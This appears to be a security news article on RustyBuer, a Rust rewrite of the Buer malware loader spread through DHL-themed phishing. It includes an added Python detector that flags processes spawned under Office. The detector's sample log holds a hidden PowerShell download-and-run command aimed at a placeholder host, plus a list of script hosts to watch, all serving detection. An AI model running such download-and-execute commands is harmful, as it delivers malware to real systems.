Researchers find a new variant of the Buer loader written in Rust
Researchers at Proofpoint discovered a new variant of the Buer malware loader, distributed through emails disguised as shipping notices. Buer is a downloader sold on underground markets that first appeared in 2019. It is used to establish a foothold in an infected network and to deliver other malware, including ransomware.
The new variant discovered by Proofpoint's researchers is written in a completely different programming language from the original malware. Such a rewrite is unusual, but it helps the new activity go undetected in attacks against Windows systems. The original Buer was written in C; the new variant is written in Rust, so the researchers named it RustyBuer.
RustyBuer is typically delivered via phishing emails. In the observed campaigns the emails were crafted to look as though they came from the courier company DHL. They contain a link to download a malicious Microsoft Word or Excel document, whose macros deliver the new variant. The emails targeted more than 200 organizations across more than 50 industries.
- The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular. Proofpoint calls this variant RustyBuer.
- Rewriting the malware in Rust lets the threat actor evade existing detections written for the original Buer: signatures tuned to the C build do not match the Rust binary.
- Proofpoint observed RustyBuer delivering Cobalt Strike Beacon as a second-stage payload in some campaigns.
- Researchers assess that some threat actors may be establishing a foothold with the Buer loader in order to sell that access to other threat actors, a model known as “access-as-a-service.”
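The delivery chain above (phishing link, macro-enabled Word or Excel document, loader) is where the Rust rewrite buys the attacker nothing: signatures for the C build stop matching, but an Office process spawning a command shell, script host or rundll32 looks the same whichever language the loader is compiled in. The following added example is not code from Proofpoint or from the article; it is a small behavioural detection that walks a constructed set of process-creation events (key=value lines loosely modelled on Sysmon event 1, with invented PIDs, paths, a DHL-themed file name and the placeholder domain example.invalid) and flags any process whose ancestry within a few hops includes an Office application, except for children Office launches legitimately.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events (not real telemetry from the RustyBuer
# campaigns). One event per line; quoted values may contain spaces.
SAMPLE_LOG = r"""
ts=2021-05-03T09:12:01Z pid=4120 ppid=1188 parent="C:\Windows\explorer.exe" image="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmdline="WINWORD.EXE DHL_Shipping_Notice_4471.docm"
ts=2021-05-03T09:12:09Z pid=5304 ppid=4120 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c powershell -w hidden -c iwr http://example.invalid/rb.exe -OutFile %TEMP%\rb.exe"
ts=2021-05-03T09:12:10Z pid=5320 ppid=5304 parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -w hidden -c iwr http://example.invalid/rb.exe -OutFile %TEMP%\rb.exe"
ts=2021-05-03T09:12:15Z pid=5388 ppid=5320 parent="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" image="C:\Users\alice\AppData\Local\Temp\rb.exe" cmdline="rb.exe"
ts=2021-05-03T09:14:10Z pid=6012 ppid=5900 parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\splwow64.exe" cmdline="splwow64.exe 12288"
ts=2021-05-03T09:15:40Z pid=6100 ppid=5900 parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\rundll32.exe" cmdline="rundll32.exe C:\Users\Public\update.dll,Start"
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Direct children Office starts legitimately (print helper). Assumption: extend
# this allowlist from your own baseline before deploying the rule.
EXPECTED_OFFICE_CHILDREN = {"splwow64.exe"}
# Script hosts and proxy-execution binaries that macro droppers commonly chain into.
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
MAX_DEPTH = 4  # how many parent hops to search for an Office ancestor

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (used to compare images)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(ev: Dict[str, str], by_pid: Dict[str, Dict[str, str]],
                    depth: int = MAX_DEPTH) -> Optional[str]:
    """Walk up the parent chain and return the first Office app found, if any.

    The parent's own creation event (looked up by its PID) tells us the
    grandparent, and so on, until the chain leaves the log or depth is exhausted.
    """
    parent_name, ppid = basename(ev["parent"]), ev["ppid"]
    for _ in range(depth):
        if parent_name in OFFICE_APPS:
            return parent_name
        parent_ev = by_pid.get(ppid)
        if parent_ev is None:
            return None
        parent_name, ppid = basename(parent_ev["parent"]), parent_ev["ppid"]
    return None


def office_spawn_alerts(log: str) -> List[Dict[str, str]]:
    """Return one alert per process descended from an Office app within MAX_DEPTH hops."""
    events = [parse_event(l) for l in log.splitlines() if l.strip()]
    by_pid = {ev["pid"]: ev for ev in events}
    alerts: List[Dict[str, str]] = []
    for ev in events:
        child = basename(ev["image"])
        if child in OFFICE_APPS:
            continue  # the Office application itself starting is normal
        ancestor = office_ancestor(ev, by_pid)
        if ancestor is None:
            continue
        if child in EXPECTED_OFFICE_CHILDREN and basename(ev["parent"]) in OFFICE_APPS:
            continue  # allowlisted direct child of Office
        alerts.append({
            "ts": ev["ts"], "pid": ev["pid"], "office_ancestor": ancestor,
            "process": child, "cmdline": ev["cmdline"],
            "severity": "high" if child in HIGH_RISK_CHILDREN else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in office_spawn_alerts(SAMPLE_LOG):
        print(f'{a["ts"]} [{a["severity"]}] {a["office_ancestor"]} -> {a["process"]}: {a["cmdline"]}')
```

Walking the ancestry rather than checking only the direct parent matters here: the downloaded loader is started by powershell.exe, two hops below WINWORD.EXE, so a parent-only rule would miss the payload execution itself. The splwow64.exe allowlist is the kind of tuning such a rule needs in practice; start from your own baseline of what Office spawns, not from this list.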
Researchers say that the rewritten malware and the new, more legitimate-looking lures show that the actors behind RustyBuer are working on several fronts to evade detection and to raise click-through rates. Given the frequency of observed RustyBuer activity, they expect further variants to appear.